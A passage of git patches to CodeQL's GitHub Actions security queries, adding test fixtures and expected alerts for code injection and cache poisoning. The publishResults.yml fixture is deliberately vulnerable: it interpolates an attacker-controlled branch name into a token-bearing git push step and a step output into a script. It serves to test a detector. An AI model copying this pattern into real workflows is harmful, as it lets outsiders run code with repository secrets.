issue_comment | issue_comment | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a 
privileged workflow ($@) | .github/workflows/untrusted_checkout2.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_untrusted_checkout_2.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/workflow_run_untrusted_checkout_2.yml:2:3:2:14 | workflow_run | workflow_run | From 24a3df03869b741d6051194569433b1eb0723b13 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 13:41:23 +0100 Subject: [PATCH 643/707] tests: new tests for Code Injection --- .../.github/workflows/publishResults.yml | 80 +++++++++++++++++++ .../CWE-094/.github/workflows/test22.yml | 12 +++ .../CWE-094/CodeInjectionCritical.expected | 8 ++ 3 files changed, 100 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml new file mode 100644 index 000000000000..17d9680d9074 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml 
@@ -0,0 +1,80 @@
+on:
+ workflow_call:
+ inputs:
+ botGithubId:
+ description: bot id
+ type: string
+ required: true
+
+ secrets:
+ githubBotPAT:
+ description: The personal access token
+ required: true
+
+permissions: {} # all none
+
+jobs:
+ versions-check-result:
+ name: Publish Results
+ runs-on: ubuntu-latest
+ if: github.event.workflow_run.conclusion != 'skipped'
+ steps:
+
+ - uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ id: search-patch
+ with:
+ script: |
+ let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ run_id: context.payload.workflow_run.id,
+ ...context.repo
+ })
+ let artifact = allArtifacts.data.artifacts.find(artifact => artifact.name == 'git-patch')
+ return artifact?.id
+
+ - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+ if: steps.search-patch.outputs.result
+ with:
+ ref: '${{ github.event.workflow_run.head_sha }}'
+ persist-credentials: false #Opt out from persisting the default Github-token authentication in order to enable use of the bot's PAT when pushing below
+
+ - name: Download git patch
+ uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ id: fetch-patch
+ if: steps.search-patch.outputs.result
+ with:
+ script: |
+ let download = await github.rest.actions.downloadArtifact({
+ artifact_id: ${{ steps.search-patch.outputs.result }},
+ archive_format: 'zip',
+ ...context.repo
+ })
+ let fs = require('fs')
+ fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/patch.zip`, Buffer.from(download.data))
+ await exec.exec('unzip', ['patch.zip'])
+ let pr_number = Number(fs.readFileSync('github_pull_request_number.txt'))
+ core.setOutput('pull_request_number', pr_number)
+ await io.rmRF('patch.zip')
+ await io.rmRF('github_pull_request_number.txt')
+
+ - name: Apply and push version increment
+ id: git-commit
+ if: steps.search-patch.outputs.result
+ run: |
+ fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)
+ echo 
"file-list<> $GITHUB_OUTPUT
+ echo "$fileList" >> $GITHUB_OUTPUT
+ echo "EOF" >> $GITHUB_OUTPUT
+
+ git push \
+ "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \
+ 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'
+ env:
+ BOT_PA_TOKEN: ${{ secrets.githubBotPAT }}
+
+ - name: Add or update information comment
+ uses: actions/github-script@60a0d83039c74a4aee543508d2ffcb1c3799cdea # v7.0.1
+ if: always()
+ with:
+ github-token: ${{ secrets.githubBotPAT }}
+ script: |
+ const fileList = `${{ steps.git-commit.outputs.file-list }}`
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml
new file mode 100644
index 000000000000..52f7e8964c13
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test22.yml
@@ -0,0 +1,12 @@
+on:
+ workflow_run:
+ workflows: [ 'Pull-Request Checks' ]
+ types: [ completed ]
+
+jobs:
+ publish-results:
+ uses: TestOrg/TestRepo/.github/workflows/publishResults.yml@master
+ with:
+ botGithubId: bot
+ secrets:
+ githubBotPAT: ${{ secrets.BOT_PAT }}
diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
index dad99f0029a2..5187e875cb73 100644
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
+++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected
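Review bot: The new publishResults.yml fixture carries no comment saying which expressions it is meant to exercise, so a reader has to cross-reference CodeInjectionCritical.expected to learn that `${{ github.event.workflow_run.head_branch }}` in the `git push` refspec of the git-commit run step and `${{ steps.git-commit.outputs.file-list }}` in the final github-script block are the two expected sinks. A header comment along the lines of `# Test fixture (intentionally vulnerable): expects CodeInjectionCritical alerts on the workflow_run.head_branch refspec in step git-commit and on steps.git-commit.outputs.file-list in the last github-script step; reached via test22.yml (workflow_run trigger)` would make that explicit and keep the two files in sync when either is edited. It is also worth a one-line comment that `permissions: {}` and `persist-credentials: false` are deliberate, so the fixture isolates expression injection rather than token scope. The line `echo "file-list<> $GITHUB_OUTPUT` appears to have lost its heredoc delimiter in this rendering (the same text shows up in the .expected rows), so it is worth confirming the committed file holds the `<<EOF` form the following `echo "EOF"` line implies.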
@@ -13,6 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | 
@@ -232,6 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | 
input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -617,6 +623,8 @@ subpaths | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | From ee7e50c1cf5787f0a129863d81eea34972e39c0a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 13:42:02 +0100 Subject: [PATCH 644/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 29687dd7a061..9554a52d9348 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.78 +version: 0.1.79 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7b88d83d38e0..f6fe9791a934 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.78 +version: 0.1.79 groups: [actions, queries] suites: codeql-suites extractor: javascript From 871193095a9eb55a4117f126576bd912df9bad8f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 19:04:02 +0100 Subject: [PATCH 645/707] feat: Add trigger event to cache poisoning queries --- .../Security/CWE-349/CachePoisoningViaDirectCache.ql | 3 ++- .../Security/CWE-094/CodeInjectionMedium.expected | 6 ++++++ .../CWE-349/CachePoisoningViaDirectCache.expected | 12 ++++++------ 3 files changed, 14 insertions(+), 7 deletions(-) diff --git a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql index 91bb4d3bc5a3..85a0f53df1dc 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaDirectCache.ql @@ -67,4 +67,5 @@ where ) and not step instanceof PoisonableStep select step, source, step, - "Potential cache poisoning in the context of the default branch " + message + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 5d1ae7c3e74f..ddfa951241e3 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
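Review bot: The new select string appends `" ($@)."` to `message`, but the `message` values already end in a full stop, so the rendered alert reads `...of untrusted code. ($@).` — visible in the updated CachePoisoningViaDirectCache.expected rows in this same commit. Either drop the trailing period from the `message` strings where they are bound (presumably in the `where` clause, which starts outside this hunk) or change the suffix to `+ " ($@)"`, which also matches the `Potential execution of untrusted code on a privileged workflow ($@)` form the UntrustedCheckout expectations use. If that string is edited anyway, `privilege checkout` should read `privileged checkout`.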
@@ -13,6 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | 
.github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | 
@@ -232,6 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | 
input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index f45755adf1d7..4cc8536b5943 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -44,9 +44,9 @@ edges | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | #select -| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. 
| -| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | +| .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | .github/workflows/direct_cache1.yml:13:9:18:6 | Uses Step | .github/workflows/direct_cache1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache2.yml:11:9:14:6 | Uses Step | .github/workflows/direct_cache2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache2.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache3.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). 
| .github/workflows/direct_cache4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache5.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/direct_cache6.yml:4:3:4:21 | pull_request_target | pull_request_target |
From 58f060234a066b8aa37212cf249d2c2466f2c4bc Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 29 Oct 2024 19:17:24 +0100
Subject: [PATCH 646/707] fix: count(text.splitAt()) does not account for all lines, use max(text.splitAt(,i)) instead
---
ql/lib/codeql/actions/ast/internal/Ast.qll | 10 +++++++---
1 file changed, 7 insertions(+), 3 deletions(-)
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
index 5f33400bb962..574662254144 100644
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -4,12 +4,16 @@ private import codeql.actions.Helper
 private import codeql.actions.config.Config
 private import codeql.actions.DataFlow
+bindingset[text]
+int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", i))) }
+
 /**
 * Gets the length of each line in the StringValue .
 */
 bindingset[text]
-int lineLength(string text, int idx) {
- exists(string line | line = text.splitAt("\n", idx) and result = line.length() + 1)
+int lineLength(string text, int i) {
+ i in [0 .. numberOfLines(text)] and
+ result = text.splitAt("\n", i).length() + 1
 }
 /**
@@ -17,7 +21,7 @@ int lineLength(string text, int idx) {
 */
 bindingset[text]
 int partialLineLengthSum(string text, int i) {
